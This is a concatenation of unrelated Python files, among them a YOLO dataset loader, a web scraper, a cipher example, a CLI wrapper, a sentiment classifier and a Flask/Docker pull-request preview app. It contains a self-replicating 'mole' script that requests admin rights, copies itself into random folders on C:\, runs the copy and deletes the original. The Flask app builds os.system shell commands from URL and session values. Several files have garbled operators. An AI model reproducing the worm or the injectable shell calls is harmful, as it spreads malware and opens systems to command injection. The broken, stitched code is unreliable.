'天府可乐':8,'可口可乐':9,'农夫山泉':10,'恒大冰泉':11,'其它':12,'冰露':13} labels_list = [] for i in label_name: # label_name中存放的是分类的名称 if len(i)>1: i.pop(-1) for j in i: label = classifier[j] # 根据名称对应到数字 labels_list.append(label) return labels_list # 对应到数字的label # 计算图片的均值和方差 def get_mean_std(image_list): ''' file_name: train,txt img_path: 'week10_dataset/image/' 146 normMean = [140.7888129 131.87180331 126.43424442] normStd = [53.84969082 54.91440049 56.4051085 ] normMean = [142.20270479 131.69554463 126.34654796] normStd = [53.93910735 55.32934892 56.66741758] ''' means = [0, 0, 0] stdevs = [0, 0, 0] num_imgs = 0 for image_path in image_list: num_imgs += 1 # 记录图片的个数 img = cv2.imdecode(np.fromfile(image_path, dtype=np.uint8), -1)## 读取图像，解决imread不能读取中文路径的问题 img = np.array(img).astype(np.float32) for i in range(3): # 对图片三个通道分别求均值和方差，累加所有图片 means[i] += img[:, :, i].mean() stdevs[i] += img[:, :, i].std() means.reverse() stdevs.reverse() means = np.asarray(means) / num_imgs # 所有图片的均值和方差之和除以图片总数 stdevs = np.asarray(stdevs) / num_imgs # print("normMean = {}".format(means)) # print("normStd = {}".format(stdevs)) return means, stdevs class myDataset(DataLoader): image_size = 448 # 图片期待缩小到的尺寸 def __init__(self, image_path, labels_list, bboxes, train, transform): self.boxes = [] # tensor形式的所有坐标信息 self.labels = [] # 所有数字label self.image = [] # 所有图片路径 self.train = train self.transform = transform self.S = 14 # grid number 1414 normally self.B = 2 # bounding box number in each grid self.classes_num = 14 # how many classes self.mean = (142, 132, 126) # RGB for image,label,bbox in zip(image_path,labels_list,bboxes): self.boxes.append(torch.tensor(bbox)) self.labels.append(label) self.image.append(image) self.num_samples = len(self.boxes) def __getitem__(self, idx): img = self.image[idx] img = cv2.imdecode(np.fromfile(img, dtype=np.uint8), -1)## 读取图像，解决imread不能读取中文路径的问题 box = self.boxes[idx] # print('box{}'.format(box)) # box = box.unsqueeze(0) # print('box{}'.format(box)) # print(box) labels = self.labels[idx] if self.train: # torch自带的transform会造成bbox的坐标,需要自己来定义数据增强 pass h, w, _ = img.shape box /= torch.LongTensor([w, h, w, h]).expand_as(box) # 坐标归一化处理，为了方便训练 img = self.BGR2RGB(img) # cv2读入的图片是BGR形式，pytorch pretrained model use RGB，所以要转换一下 img = self.subMean(img, self.mean) # 减去均值 img = cv2.resize(img, (self.image_size, self.image_size)) # 将所有图片都resize到指定大小\ target = self.encoder(box, labels) # 将图片标签编码到14x1424的向量 for t in self.transform: img = t(img) return img, target def __len__(self): return self.num_samples def subMean(self, img, mean): mean = np.array(mean, dtype=np.float32) img = img - mean # img = img/(255.0/2)-1 # img = np.array(img,dtype=np.float32) return img def BGR2RGB(self, img): return cv2.cvtColor(img, cv2.COLOR_BGR2RGB) def encoder(self, boxes, labels): ''' 将图片标签编码到14x1424的向量前10层为坐标信息，图片分成1414个格子，bbox所在的格子的置信度为1，其他格子为0，后14层为分类信息，label对应的那一层为1，其他层为0 boxes (tensor) [[x1,y1,x2,y2]] labels (tensor) [...] return 14x14x24 ''' # print(boxes) grid_num = 14 yolo_output = 24 # 52+14 target = torch.zeros((grid_num, grid_num, yolo_output)) cell_size = 1. / grid_num # 每个格子的大小 # 右下坐标左上坐标 # x2,y2 x1,y1 x2y2 = boxes[:,2:] # 所有的bbox x1y1 = boxes[:,:2] wh = x2y2 - x1y1 cxcy = (x2y2 + x1y1) / 2 # 中心点坐标 for i in range(cxcy.size()[0]): # cxcy.size()[0]代表一张图像的物体总数，遍历一张图像的物体总数 # 物体中心坐标 cxcy_sample = cxcy[i] # 指示落在那网格，如[0,0] ij = (cxcy_sample / cell_size).ceil() - 1 # 中心点对应格子的坐标# ceil返回数字的上入整数 # cxcy_sample为一个物体的中心点坐标，求该坐标位于14x14网格的哪个网格 # cxcy_sample坐标在0-1之间现在求它再0-14之间的值，故乘以14 # ij长度为2，代表14x14框的某一个框负责预测一个物体 # 0 1 2 3 4 5 6 7 8 9 # target[中心坐标,长宽,置信度,中心坐标,长宽,置信度, 14个类别] x 14x14 因为一个框预测两个物体 # 每行的第4和第9的值设置为1，即每个网格提供的两个真实候选框框住物体的概率是1. # xml中坐标理解：原图像左上角为原点，右边为x轴，下边为y轴。 # 而二维矩阵（x，y） x代表第几行，y代表第几列 # 假设ij为（1,2）代表x轴方向长度为1，y轴方向长度为2 # 二维矩阵取（2,1）从0开始，代表第2行，第1列的值 # 第一个框的置信度 target[int(ij[1]), int(ij[0]), 4] = 1 # 第二个框的置信度 target[int(ij[1]), int(ij[0]), 9] = 1 # 类别，加9是因为前0-9为两个真实候选款的值。后10-20为20分类将对应分类标为1 target[int(ij[1]), int(ij[0]), int(labels) + 9] = 1 # xy为归一化后网格的左上坐标---->相对整张图 xy = ij cell_size # 匹配到的网格的左上角相对坐标 # 物体中心相对左上的坐标 ---> 坐标x,y代表了预测的bounding # box的中心与栅格边界的相对值 # delta_xy：真实框的中心点坐标相对于位于该中心点所在网格的左上角的相对坐标，此时可以将网格的左上角看做原点，你这点相对于原点的位置。取值在0-1，但是比1/14小 delta_xy = (cxcy_sample - xy) / cell_size # 其实就是offset # (1) 每个小格会对应B(2)个边界框，边界框的宽高范围为全图，表示以该小格为中心寻找物体的边界框位置。 # (2) 每个边界框对应一个分值，代表该处是否有物体及定位准确度 # (3) 每个小格会对应C个概率值，找出最大概率对应的类别P(Class\|object)，并认为小格中包含该物体或者该物体的一部分。 # 坐标w,h代表了预测的bounding box的width、height相对于整幅图像width,height的比例 target[int(ij[1]), int(ij[0]), 2:4] = wh[i] target[int(ij[1]), int(ij[0]), :2] = delta_xy # 每一个网格有两个边框 target[int(ij[1]), int(ij[0]), 7:9] = wh[i] # 长宽 # 中心坐标偏移 # 由此可得其实返回的中心坐标其实是相对左上角顶点的偏移，因此在进行预测的时候还需要进行解码 target[int(ij[1]), int(ij[0]), 5:7] = delta_xy # print('target{}'.format(target)) return target if __name__ == '__main__': image_path, label_path,label_name = make_list() label_list = make_label(label_name) bboxes = get_bbox(label_path,image_path) print(bboxes) print(len(bboxes)) # for box in bboxes: # print(box) # print(len(bboxes)) # image_path = 'D:\Python\CV\week12\week10_dataset\skypower\\6ae24597511ce627185bb26737a5a64.jpg' # img = cv2.imdecode(np.fromfile(image_path, dtype=np.uint8), -1) ## 读取图像，解决imread不能读取中文路径的问题 # cv2.namedWindow('image',cv2.WINDOW_NORMAL) # cv2.imshow('image',img) # cv2.waitKey(0)
kimport model_training import predict import Data_importer from datetime import datetime as dt def main(): tstart = dt.now() print('\nStarting with program\n') model_training.main() print('Finished training model in:\n', dt.now()-tstart) print('predicting outcome of test set:\n') bool_ = input('start predicting? Y/N?\n') if bool_=='Y': tstart2 = dt.now() predict.main() print('\nFinished predicting in:\n',dt.now()-tstart2) print('\nFinished whole program in:\n',dt.now()-tstart) print('Predictions can be found in:', Data_importer.location_lookup()["submission_path"]) if __name__=="__main__": smain()
from bs4 import BeautifulSoup from speaker import Speaker from topic import Topic from speech import Speech import urllib import re class Scraper(object): """Docstring for Scraper.""" def __init__(self): """Docstring for init.""" super(Scraper, self).__init__() def scrape(self, p): """Scrape the P.""" found_ref = p.find(attrs={'name': re.compile("_Toc")}) if (found_ref): return self.parseHeader(found_ref) else: return Speech(p.text.strip()) def parseHeader(self, ref): """Parse the Ref.""" title = ref.parent if (re.compile("(Mme\|M\.)").match(title.text.strip())): return Speaker(title.text.strip()) elif re.compile("font-weight:bold").match(title['style']): return Topic(title.text.strip()) scraper = Scraper() html_object = BeautifulSoup(urllib.urlopen('http://www.assnat.qc.ca/en/travaux-parlementaires/assemblee-nationale/41-1/journal-debats/20161004/180251.html'), 'html.parser') the_ps = html_object.find("contenu").find_all('p'); # find(attrs={'name': re.compile("_Toc")}).parent.text.strip() # print(the_ps) # scraper.scrape(the_ps[0]) # scraper.scrape(the_ps[1]) # scraper.scrape(the_ps[2]) # scraper.scrape(the_ps[3]) # scraper.scrape(the_ps[4]) for x in xrange(5,9): object = scraper.scrape(the_ps[x]) if type(object) == Topic: print(object.title) elif type(object) == Speech: print(object.text) elif type(object) == Speaker: print(object.name) else: print(type(object))
""" re-write the initialization part in the CaesarCipher """ from example_cipher import CaesarCipher class CaesarCipher2(CaesarCipher): def __init__(self, shift): """this part replaces the original initialization""" self._forward_key = "".join( chr( (k+shift)%26 + ord('A') ) for k in range(26) ) # don't need the "list" symbol in: join([xxxx]) self._backward_key = "".join( chr( (k-shift)%26 + ord("A") ) for k in range(26) ) # print("ok") if __name__ == '__main__': msg = "THE EAGLE IS IN PLAY; MEET AT JOE'S" cipher = CaesarCipher2(3) coded = cipher.encrypt(msg) decoded = cipher.decrypt(coded) print(coded) print(decoded)
from random import randrange get_zero_or_one = lambda: randrange(2) def get_random(max_number): # Please implement this method # using only `get_zero_or_one` k = 0 while max_number > 2 k: k = k + 1 num = max_number while num >= max_number: num = 0 for i in range(0, k): num += (2 i) * get_zero_or_one() return num # Test numberCount = [0] * 30 i = 0 while i < 9999 : numberCount[get_random(30)] += 1 i += 1 print numberCount
import io import cmd import platform import sys import signal if platform.system() in ('Linux', 'Darwin'): import readline else: import pyreadline as readline import shlex import traceback import importlib.util from argparse import _SubParsersAction from argparse import _HelpAction, Action from contextlib import redirect_stdout # Prevent to execute exit() when help and error method in argparse.Argparser sys.exit = lambda x: None def signal_int_handler(signum, frame): print('No functions are defined for interrupt signals, see the Signals topic in the manual for more information.') exit(0) class ArgumentCmd(cmd.Cmd): argument_parser = None # ========================================================================== def __init__(self): super(ArgumentCmd, self).__init__() if 'libedit' in readline.__doc__: readline.parse_and_bind("bind ^I rl_complete") else: # for gnureadline readline.parse_and_bind("tab: complete") ArgumentCmd.read_prompt() # ========================================================================== def _do_command(self, line, args, *kwargs): parser = self.argument_parser prog = kwargs["prog"].strip() try: command = f'{prog} {line}'.strip() spec = parser.parse_args(shlex.split(command)) if 'func' not in spec: return if any(x in command for x in ('-h', '--help')): return spec.func(spec) except TypeError: # parse_args raise exception when wrong input. return except Exception as e: traceback.print_exc() # Todo: Do something for errors return # ========================================================================== def emptyline(self): pass # ========================================================================== def postcmd(self, stop: bool, line: str) -> bool: ArgumentCmd.read_prompt() return cmd.Cmd.postcmd(self, stop, line) # ========================================================================== def complete(self, text, state): if state == 0: origline = readline.get_line_buffer() line = origline.lstrip() command, args, foo = self.parseline(line) if command == '': result = self.completedefault else: result = ArgumentCmd.get_complete_list( shlex.split(line), self.argument_parser) result = [x + ' ' for x in result] result.append(None) self.completion_matches = result try: return self.completion_matches[state] except IndexError: return None # ========================================================================== @staticmethod def get_complete_list(line, parser, result=None): if None is result: result = list() word = '' if line: word = line.pop(0) for action in parser._actions: if isinstance(action, _HelpAction): continue elif isinstance(action, _SubParsersAction): rc = [x for x in action.choices.keys() if x.startswith(word)] if 1 == len(rc) and word == rc[0]: return ArgumentCmd.get_complete_list( line, action.choices[word], list()) result += [x for x in action.choices.keys() if x.startswith(word)] elif isinstance(action, Action): result += [ x for x in action.option_strings if x.startswith(word)] else: pass return result # ========================================================================== @staticmethod def get_empty_func(_type, action, parser): def do(self, line): self._do_command(self, line, prog=action.prog) def complete(self, text, line, start_index, end_index): return self._complete_command( self, text, line, start_index, end_index) f = {'do': do, 'complete': complete} return f[_type] # ========================================================================== @classmethod def _add_functions(cls, actions, parser): for action in actions.choices.values(): with io.StringIO() as buf, redirect_stdout(buf): print(action.print_usage()) output = buf.getvalue() for _type in ('do',): command = ArgumentCmd.get_empty_func( _type, action=action, parser=parser) command.__doc__ = output command.__name__ = f"{_type}_{action.prog.split()[-1].strip()}" setattr(cls, command.__name__, classmethod(command)) # ========================================================================== @classmethod def _add_command(cls, parser): for action in parser._actions: if isinstance(action, _HelpAction): continue if isinstance(action, _SubParsersAction): ArgumentCmd._add_functions(action, parser) # ========================================================================== @classmethod def set_cli_parser(cls, parser): cls.argument_parser = parser cls._add_command(parser) # ========================================================================== @staticmethod def read_prompt(): try: with open('prompt', 'r') as f: prompt = f.read() if prompt: ArgumentCmd.prompt = prompt + ' ' except FileNotFoundError: pass return ArgumentCmd.prompt def run(cli_package): # Import user CLI package module_name = 'cli' spec = importlib.util.spec_from_file_location('cli', cli_package) module = importlib.util.module_from_spec(spec) sys.modules[module_name] = module spec.loader.exec_module(module) cli_parser = module.argument_parser() # Run CLI-Arguments command = ArgumentCmd command.set_cli_parser(cli_parser) my_cmd = command() my_cmd.cmdloop() # Signal signal.signal(signal.SIGINT, signal_int_handler)
# -- coding: utf-8 -- """ Created on Sat Nov 28 09:39:40 2020 @author: lakhan """ #importing libraries import numpy as np import pandas as pd import re import nltk import matplotlib.pyplot as plt #importing the data airline = pd.read_csv('airline_sentiment_analysis.csv') airline.airline_sentiment.value_counts().plot(kind='pie', autopct='%1.0f%%', colors=["red", "yellow"]) from nltk.corpus import stopwords from nltk.stem.porter import PorterStemmer corpus = [] for i in range(0, 1000): review = re.sub('[^a-zA-Z]', ' ', airline['airline_sentiment'][i]) review = review.lower() review = review.split() ps = PorterStemmer() all_stopwords = stopwords.words('english') all_stopwords.remove('not') review = [ps.stem(word) for word in review if not word in set(all_stopwords)] review = ' '.join(review) corpus.append(review) print(corpus) # Creating the Bag of Words model from sklearn.feature_extraction.text import CountVectorizer cv = CountVectorizer(max_features = 1500) X = cv.fit_transform(corpus).toarray() y = airline.iloc[:, -1].values from sklearn.compose import ColumnTransformer from sklearn.preprocessing import OneHotEncoder ct = ColumnTransformer(transformers=[('encoder', OneHotEncoder(), [1])], remainder='passthrough') corpus = np.array(ct.fit_transform(X)) #training the datasets from sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split(corpus, X, test_size=0.2, random_state=0) #classifier from sklearn.ensemble import RandomForestClassifier text_classifier = RandomForestClassifier(n_estimators = 200, oob_score = 'TRUE', n_jobs = -1,random_state =50, max_features = "auto", min_samples_leaf = 50) text_classifier.fit(X_train, y_train) predictions = text_classifier.predict(X_test) #predictions from sklearn.metrics import classification_report, confusion_matrix, accuracy_score matrix = confusion_matrix( y_test.argmax(axis=1), predictions.argmax(axis=1)) sentiment = classification_report(y_test ,predictions) accuracy = accuracy_score(y_test, predictions) print(matrix) print(sentiment) print(accuracy)
from .stage import PipelineStage import numpy as np import blind2pt class Blinding(PipelineStage): name = "blind" # fixed cosmological parameter sets input. # cosmosis parameter file and values file # string seed from the parameter inputs = { "2pt_extended" : ("2pt", "2pt_extended_data.fits") , "2pt_ng" : ("2pt", "2pt_NG.fits") , "2pt_g" : ("2pt", "2pt_G.fits") , } outputs = { "2pt_ng" : "2pt_NG_blinded.fits", "2pt_g" : "2pt_G_blinded.fits", "2pt_extended" : "2pt_extended_data_blinded.fits", } def __init__(self, param_file): super(Blinding,self).__init__(param_file) def run(self): blinding_string = self.params['blinding_seed'] cosm_file = self.params['shiftcosm_file'] inifor2pt = self.params['inifor2pt'] cosmdict = blind2pt.read_npzfile(cosm_file) refcosm = blind2pt.get_cosm_forind(cosmdict,0) shiftcosm = blind2pt.get_cosm_forseedstr(cosmdict,blinding_string) factordict = blind2pt.gen_blindingfactors(refcosm,shiftcosm,inifor2pt,self.input_path('2pt_g')) # ^ the only thing this uses from the input file is n(z), so if that's the same for all # input files, then you only need to do this once for file_type in ['2pt_g', '2pt_ng', '2pt_extended']: input_file = self.input_path(file_type) output_file = self.output_path(file_type) blind2pt.apply2ptblinding(factordict,input_file, inifor2pt, outfile = output_file) def write(self): pass
A = input ().split () B = input ().split () for i in range (len (A)): A [i] = int(A [i]) for j in range (len (B)): B [j] = int(B [j]) C = [] for k in range (len (A)): s = B.count (A [k]) if s > 0: C.append(A [k]) for x in range (len (C)): print(C [x], end = ' ')
class NamedObjectList(list): def __getitem__(self, key): if isinstance(key, str): for item in self: if item.name == key: return item raise IndexError('no object named {!r}'.format(key)) return list.__getitem__(self, key)
# # Copyright (C) 2018 Satoru SATOH <ssato @ redhat.com> # License: MIT # # pylint: disable=missing-docstring, invalid-name import os.path import os import unittest import anyconfig.compat import anyconfig.ioinfo as TT import anyconfig.utils from anyconfig.globals import ( IOI_PATH_STR, IOI_PATH_OBJ, IOI_STREAM, ) import tests.common as TC IPATH_0 = os.path.join(TC.resdir(), "00-cnf.json") IPATH_0_FULL = anyconfig.utils.normpath(IPATH_0) IPATH_0_EXT = anyconfig.utils.get_file_extension(IPATH_0) class Test_10_inspect_io_obj(unittest.TestCase): def test_10_path_str(self): self.assertEqual(TT.inspect_io_obj(IPATH_0), (IOI_PATH_STR, IPATH_0_FULL, open, IPATH_0_EXT)) def test_20_stream(self): self.assertEqual(TT.inspect_io_obj(open(IPATH_0)), (IOI_STREAM, IPATH_0_FULL, anyconfig.utils.noop, IPATH_0_EXT)) def test_22_stream(self): stdin = os.fdopen(0) res = TT.inspect_io_obj(stdin) self.assertEqual(res[0], IOI_STREAM) self.assertEqual(res[2], anyconfig.utils.noop) def test_30_path_obj(self): if anyconfig.compat.pathlib is None: return ipo = anyconfig.compat.pathlib.Path(IPATH_0) self.assertEqual(TT.inspect_io_obj(ipo), (IOI_PATH_OBJ, IPATH_0_FULL, ipo.open, IPATH_0_EXT)) class Test_30_make(unittest.TestCase): (ipath, ipath_full) = (IPATH_0, IPATH_0_FULL) def __init__(self, args, kwargs): super(Test_30_make, self).__init__(args, *kwargs) self.fun = TT.make def __checks_helper(self, inp, args): self.assertEqual(inp.src, args[0]) self.assertEqual(inp.path, args[1]) self.assertEqual(inp.type, args[2]) self.assertEqual(inp.opener, args[3]) self.assertEqual(inp.extension, args[4]) def test_30__by_fileext(self): res = self.fun(self.ipath) self.__checks_helper(res, self.ipath, self.ipath_full, IOI_PATH_STR, open, IPATH_0_EXT) def test_40__pathlib(self): ipath = self.ipath if anyconfig.compat.pathlib is not None: # Replace w/ pathlib.Path object. ipath = anyconfig.compat.pathlib.Path(ipath) itype = IOI_PATH_OBJ opener = ipath.open else: itype = IOI_PATH_STR opener = open res = self.fun(ipath) self.__checks_helper(res, ipath, self.ipath_full, itype, opener, IPATH_0_EXT) def test_50__stream(self): ifo = open(self.ipath) res = self.fun(ifo) self.__checks_helper(res, ifo, self.ipath_full, IOI_STREAM, anyconfig.utils.noop, IPATH_0_EXT) # vim:sw=4:ts=4:et:
from elasticsearch import Elasticsearch mappingJson = { "behave": { "_timestamp": { "enabled": True, "path": "date" }, "properties": { "date": { "type": "date" }, "duration": { "type": "string" }, "feature": { "type": "string", "index": "not_analyzed" }, "scenario": { "type": "string", "index": "not_analyzed" }, "scenario_status": { "type": "string", "index": "not_analyzed" }, "environment": { "type": "string", "index": "not_analyzed" }, "step": { "type": "string", "index": "not_analyzed" }, "step_number": { "type": "integer" }, "status": { "type": "string" } } } } host = 'http://localhost:9200' es = Elasticsearch([host]) result = es.indices.put_mapping( doc_type='behave', body=mappingJson, index=['reliability']) print(result)
#!/usr/bin/env python3.4 # encoding: utf-8 import os import sys from pymzid.pymzid import Mzid def main(): ''' Simple parser for Mzid files based on pymzl_integrator module © Johannes Leufken 2017 ''' reader = Mzid( sys.argv[1], verbose = False ) data_frame = reader.peptide_df for seq in data_frame['seq']: print(seq) return if __name__ == '__main__': main()
# -- coding: utf-8 -- """Classes for interactions between the TXM class and the real TXM. TxmPV A descriptor for the process variables used by the microscopes. """ import logging import datetime as dt import os import epics import numpy as np __author__ = 'Mark Wolfman' __copyright__ = 'Copyright (c) 2017, UChicago Argonne, LLC.' __docformat__ = 'restructuredtext en' __platform__ = 'Unix' __version__ = '1.6' def loggingConfig(level=logging.INFO): """Prepare a basic logging file setup with the date of the experiment.""" path = epics.caget('32idcPG3:HDF1:FilePath', as_string=True) filename = "{}.log".format(dt.date.today().isoformat()) logging.basicConfig(level=int(level), filename=os.path.join(path, filename)) def expand_position(position, length=4): """Take a tuple with length <= 4 and pad it with ``None``'s up to length. Example, if ``length=4`` and ``position=(1, 0)``, then the output is ``(1, 0, None, None)``. """ new_position = tuple(position) + (None,) * (length-len(position)) return new_position def energy_range_from_points(energy_points, energy_steps): """Convert energy ranges to a flat energy list. This function is called with a list of energy limits and spacings between those energy points: .. code:: python energy_range( energy_points=(8.3, 8.5, 8.7), energy_steps=(0.02, 0.01) ) """ # Validate the length of the lists if len(energy_points) != (len(energy_steps) + 1): raise ValueError("Number of energy points must be one more than " "number of energy steps: %d, %d" "" % (len(energy_points), len(energy_steps))) # First prepare a list of ranges ranges = [] for idx in range(len(energy_steps)): start = energy_points[idx] stop = energy_points[idx+1] step = energy_steps[idx] ranges.append((start, stop, step)) # Convert the list of ranges to a list of energies energies = energy_range(ranges) return energies def energy_range(ranges): """Convert energy ranges to a flat energy list. This function is called with multiple energy ranges: .. code:: python energy_range( (8.3, 8.5, 0.02), (8.5, 8.7, 0.01), ) Each entry in ``ranges`` should be a tuple of (start, stop, step). Unlike the standard ``range`` function, stop is inclusive.""" Es = [np.arange(r[0], r[1]+r[2], r[2]) for r in ranges] Es = np.concatenate(Es) Es = np.unique(Es) return Es
import os import docker import constants from flask import redirect, url_for, session, request, jsonify from git import Repo from app import app, github from config import Config from parser import parse from helpers import ( id_generator, find_free_port, get_pull_request_info, execute_testfile ) @app.route('/<owner>/<repo>/pull/<pr_no>') def index(owner, repo, pr_no): """ Redirects to authorize a user/org. :param owner: Owner of the github repository. :type owner: string :param repo: name of the github repository. :type repo: string :param pr_no: pull request no. for the repository. :type pr_no: string :return redirect object. """ if Config.users["default"] == "deny" and owner not in Config.users["allow"]: return redirect('404/Permission_Denied') elif Config.users["default"] == "allow" and owner in Config.users["deny"]: return redirect('404/Permission_Denied') else: session['repo'] = repo session['pr_no'] = pr_no session['repo_url'] = "{0}repos/{1}/{2}/pulls/{3}".format( Config.GITHUB_BASE_URL, owner, repo, pr_no ) print("logging: Authorizing github user") return redirect('/authorize') @app.route('/git_pull/<user>/<owner>/<repo>/<branch>') def git_pull_repo(user, owner, repo, branch): """ Pulls a repo from github and changes the branch. :param user: Authorized User. :type user: String :param owner: Repository Owner. :type owner: String :param repo: Name of the github repository. :type repo: String :param branch: Branch of the PR owner. :type branch: String :returns: Redirects to deploy_dind. """ oauth_token = session.get('oauth_token') print("logging: Pulling Repository from github") # name of the cloned repository on server repo_name = "{0}-{1}".format(repo, id_generator()) session['repo_name'] = repo_name try: # Clone the forked repository remote_url = constants.remote_url_string.format(user, repo) https_remote_url = constants.https_url_string.format( oauth_token, remote_url) Repo.clone_from(https_remote_url, repo_name) except KeyError: # Fork doesnot exist, Clone from main repository remote_url = constants.remote_url_string.format(owner, repo) https_remote_url = constants.https_url_string.format( oauth_token, remote_url) Repo.clone_from(https_remote_url, repo_name) print("logging: Repo pull complete") # change branch in the cloreponed repository os.chdir(repo_name) # changes dir to the cloned repo os.system('git checkout {}'.format(branch)) os.chdir('../') # change back to the pwd return redirect( url_for( 'deploy_dind', oauth_token=oauth_token, repo=repo_name, branch=branch) ) @app.route('/authorize') def authorize(): """ Authorizes user with defined scope. """ return github.authorize(scope=Config.scope) @app.route('/callback') @github.authorized_handler def authorization_callback(oauth_token): """ Callback function after user authorization. :param access_token: Authorization token for the logged in user. :type access_token: string :returns: Redirects to git-pull function. """ if oauth_token is None: return "User Not Authenticated" print("logging: User Authenticated") session['oauth_token'] = oauth_token repo = session.get('repo_url') user, owner, repo, branch = get_pull_request_info(oauth_token, repo) if (session.get('oauth_token') is True and session.get('{0}-{1}'.format(repo, branch)) is True): return redirect(session.get('{0}-{1}'.format( repo, session.get('pr_no'))) ) return redirect( url_for( 'git_pull_repo', oauth_token=oauth_token, user=user, owner=owner, repo=repo, branch=branch) ) @app.route('/deploy-dind/<repo>/<branch>') def deploy_dind(repo, branch): """ Deploys an isolated `Docker-In-Docker` environment and mounts the pulled repository to the container. :param oauth_token: Authorization token for Owner. :type oauth_token: String :param repo: Name of the cloned github repository. :type repo: String :param branch: Branch for the pull request. :type branch: String """ oauth_token = session.get('oauth_token') name = "exdous-{}".format(id_generator()) # to ssh into container use `docker exec -ti <name> /bin/sh` print("logging: Reading Testfile config") test_file_params = parse(repo, oauth_token) print("logging: Testfile config read") client = docker.from_env() try: volume = test_file_params['VOL'] vol_host = os.getcwd() + "/{}".format(repo) except KeyError: volume = '/{}'.format(repo) try: cwd = test_file_params['CWD'] except KeyError: cwd = '/' print("logging: find free port for the application") try: port = test_file_params['PORTS'] free_port = find_free_port(1)[0] except KeyError: return redirect("404/Ports_Not_Mentioned") print("logging: will accept tcp request on port: {}".format(free_port)) print("logging: deploying prmod/base-image") dind_env = client.containers.run( 'prmod/base-image', name=name, ports={port: free_port}, volumes={ vol_host: { 'bind': volume, 'mode': 'rw' } }, working_dir=cwd, privileged=True, detach=True) session['container_id'] = dind_env.id print("logging: prmod/base-image deployed") execute_testfile(dind_env, test_file_params) print("logging: application deployed on server") url = "{}:{}".format(Config.SERVER_IP, port) session['{0}-{1}'.format(repo, session.get('pr_no'))] = url return redirect(url) @app.route('/logout') def logout(): """ Clears the cloned repository, kills docker container and flushes session variables. """ client = docker.from_env() container_id = session.get('container') container = client.containers.get(container_id) repo = session.get('repo_name') print("logging: kills pulled docker image") container.kill() print("logging: removing cloned repository from server") os.system("rm -rf {}".format(repo)) print("logging: flushing session variables") session.clear() return "Logout" @app.route('/404/<error>') def not_found(error): return error if __name__ == '__main__': app.secret_key = Config.SECRET_KEY app.run(ssl_context=('cert.pem', 'key.pem'))
from django.conf.urls import patterns, url from planner import views urlpatterns = patterns( '', url(r'^$', views.PlannerHomeView.as_view(), name='planner' ), url(r'^(?P<year>[\d]+)/(?P<month>[\d]+)/(?P<day>[\d]+)/$', views.PlannerDayView.as_view(), name='planner-day' ), url(r'^redirect-to-date/$', views.RedirectToDateView.as_view(), name='redirect-to-date' ), url(r'^delete/(?P<pk>[\d]+)/$', views.DayRecipeDeleteView.as_view(), name='delete-dayrecipe' ), url(r'^(?P<year>[\d]+)/(?P<month>[\d]+)/' + '(?P<day>[\d]+)/add/(?P<meal>[\d])/$', views.DayRecipeCreateView.as_view(), name='create-dayrecipe' ), )
""" Adapted from: https://wiki.python.org/moin/Powerful%20Python%20One-Liners """ import sys pattern = sys.argv[1] substitution = sys.argv[2] line = 'My cat looks weirdly. The neighbours cat too...' print(line.replace(pattern, substitution))
# 单例设计模式：某个类或者模型在整个程序运行期间最多只能有一个对象被创建 # 我们可以判断，如果User这个类没有创建过对象，那么就创建一个对象保存在某个地方 # 以后如果要再创建对象，我会去判断，如果之前已经创建了一个对象，那么就不再创建 # 而是直接把之前那个对象返回回去 class User(object): __instance = None def __new__(cls, args, *kwargs): if not cls.__instance: # 以下写法和python2不同 cls.__instance = super(User, cls).__new__(cls) return cls.__instance def __init__(self, name): self.name = name # @classmethod # def share_user(cls): # return User() user1 = User('aaa') user2 = User('bbb') print(user1.name) print(user2.name)
times = 0 PATH = '' import sys import subprocess import ctypes import os import random if ctypes.windll.shell32.IsUserAnAdmin(): pass else: ctypes.windll.shell32.ShellExecuteW( None, "runas", sys.executable, __file__, None, 1) sys.exit() times = times+1 this = __file__ def random_path(): dictionary = [] for x, y in enumerate(os.walk(os.path.expanduser('C:\\'))): dictionary.append(y) return random.choice(dictionary)[0] next_path = random_path()+"\\mole"+str(times)+".py" while(('Windows'in next_path)or('System'in next_path)): next_path = random_path()+"\\mole"+str(times)+".py" print(next_path) def self_copy(): with open(__file__, 'r')as this_file: this = this_file.readlines()[2:] temp = '' for x in this: temp = temp+x this = temp with open(next_path, 'w')as file: file.write('times=%s\nPATH=r"%s"\n%s' % (times, __file__, this)) def change(): try: self_copy() except: change() else: print('this is the %s mole!, at %s' %((times-1), os.path.abspath(__file__))) try: subprocess.Popen('python '+next_path) except: change() else: os.remove(__file__)
import argparse import json from sklearn.datasets import load_wine from typing import Text import yaml def data_load(config_path: Text) -> None: """Load raw data Args: config_path {Text}: path to config """ config = yaml.safe_load(open(config_path)) raw_data_path = config['data_load']['raw_data_path'] classes_names_path = config['data_load']['classes_names_path'] data = load_wine(as_frame=True) classes_names = data.target_names.tolist() dataset = data.frame dataset.columns = [colname.strip(' (cm)').replace(' ', '_') for colname in dataset.columns.tolist()] dataset.to_csv(raw_data_path, index=False) with open(classes_names_path, 'w') as classes_names_file: json.dump(obj={'classes_names': classes_names}, fp=classes_names_file) if __name__ == '__main__': args_parser = argparse.ArgumentParser() args_parser.add_argument('--config', dest='config', required=True) args = args_parser.parse_args() data_load(config_path=args.config)
import syllabifier, sys from textgrid import TextGrid import numpy as np from phn_info import vowels, consonants import argparse def gop_feat(gop_vals, textgrid_file): """ Calculate gop statistics on vowels, consonants and syllables :param gop_vals: gop values of one utterance extracted from gop files :param textgrid_file: textgrid file :return: """ textgrid = TextGrid() textgrid.read(textgrid_file) phn_seq = "" for intervals in textgrid.tiers[1]: if intervals.mark is not None: if intervals.mark != 'SIL' and intervals.mark != 'SPN': phn_seq += " " + intervals.mark language = syllabifier.English syllables = syllabifier.syllabify(language, str(phn_seq)) vowel_gop, consonants_gop, syllable_gop = [], [], [] syllable_idx = 0 # determine which syllable current phoneme is in phn_idx = 0 syllable_phn_gop = [] for intervals in textgrid.tiers[1]: # vowels and consonants if intervals.mark is not None: if intervals.mark != 'SIL' and intervals.mark != 'SPN': if intervals.mark in vowels: vowel_gop.append(gop_vals[phn_idx]) elif intervals.mark in consonants: consonants_gop.append(gop_vals[phn_idx]) else: continue # syllables if syllable_idx < len(syllables): current_syllable = syllables[syllable_idx][1] + syllables[syllable_idx][2] + syllables[syllable_idx][3] if intervals.mark is not None: if intervals.mark != 'SIL' and intervals.mark != 'SPN': if intervals.mark in current_syllable: syllable_phn_gop.append(gop_vals[phn_idx]) if intervals.mark == current_syllable[-1]: syllable_idx += 1 syllable_gop.append(np.mean(syllable_phn_gop)) syllable_phn_gop = [] if intervals.mark is not None: 